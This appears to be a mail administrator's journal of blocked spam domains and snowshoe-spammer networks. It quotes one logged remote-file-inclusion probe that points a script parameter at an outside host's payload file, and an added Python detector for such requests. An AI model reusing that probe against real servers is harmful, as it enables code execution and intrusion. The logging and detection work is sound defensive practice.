Journal: Today's 3-strikes winner
Here's today's winner:
bluestyles.info
Snowshoe spammer.
Here's today's winners:
funtousa.info
smart-dns.net
Snowshoe spammer.
Here's today's winner:
net-ooinf.com
Here's today's list:
All came from the same Class C, just like a typical snowshoe spammer would, so that's been blocked too.
Here's today's list:
Another snowshoe spammer, so the Class C is blocked too.
Here's today's winner:
iwuzborndizway.info
As if a domain name that retarded needed anything other than being blocked.
Here's today's list:
mktdns.com
ethreemail.com
Since the takedown of the Rustock botnet total spam volume has dropped but the snowshoe spammers have cranked back up. Here's today's list:
Since the shutdown of the Rustock botnet, total spam volume has dropped but the snowshoe spammers have cranked their operations back up. Here's today's list:
I've been encountering a lot of appserv_root scans using IP addresses in Turkey as the inclusion file:
2011/4/06 03:05:43 404 (URI not found) Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
/var/log/httpd/access_log GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1
The original requests are coming from Amazon's cloud services, and other "cloud" providers like cloud-ips.com, which doesn't seem to have a Website.
If you call Amazon's whois phone number for the Technical Contact, it's their legal department. They'll never answer; you have to email or fax your request.
I got Josh Odom's personal voicemail when I called the whois Tech # for cloud-ips.com. Left a message, we'll see if he calls back.
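The appserv_root requests above are remote-file-inclusion probes: a query parameter carries a full URL the scanner hopes the script will include. As an added example (not part of the original journal), this Python sketch flags such requests in access-log lines and reports the host being offered as the include source; the function name, the regexes and every sample line except the first are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line as it appears in most access logs: METHOD target HTTP/x.y
REQUEST_RE = re.compile(r'\b(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d')
# A parameter value that is itself a remote URL is the inclusion signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group(2))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "path": target.path,
                    "param": name,
                    "include_host": urlsplit(value).hostname,
                })
    return findings

SAMPLE_LINES = [
    # Request as quoted in the journal entry above.
    "/var/log/httpd/access_log GET /appserv/main.php?"
    "appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1",
    # Constructed: same probe with the URL percent-encoded.
    '198.51.100.7 - - [06/Apr/2011:03:07:10 +0000] "GET /appserv/main.php?'
    'appserv_root=http%3A%2F%2F192.0.2.10%2Ft.txt%3F HTTP/1.1" 404 210',
    # Constructed: ordinary request that must not be flagged.
    '198.51.100.9 - - [06/Apr/2011:03:08:00 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LINES):
        print(f"{f['path']} param={f['param']} include_host={f['include_host']}")
```

Parameters that legitimately carry URLs, such as redirect targets, will also match, so an allowlist of known parameter names is needed before turning findings into blocks.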
Here's today's list:
Snowshoe spammer, so the Class C is blocked too.
Here's today's winners:
Another round of snowshoe spammers from 2 different Class C's, so they're blocked too.
Here's today's list:
aurelop.com
Snowshoe spammer, so the whole Class C is blocked too.
Here's today's winner:
cheapstingybargains.com
Here's today's list:
informationssource.info
biographicbuziness.com
More snowshoe spamming, with SMTP connections coming from several different Class C's.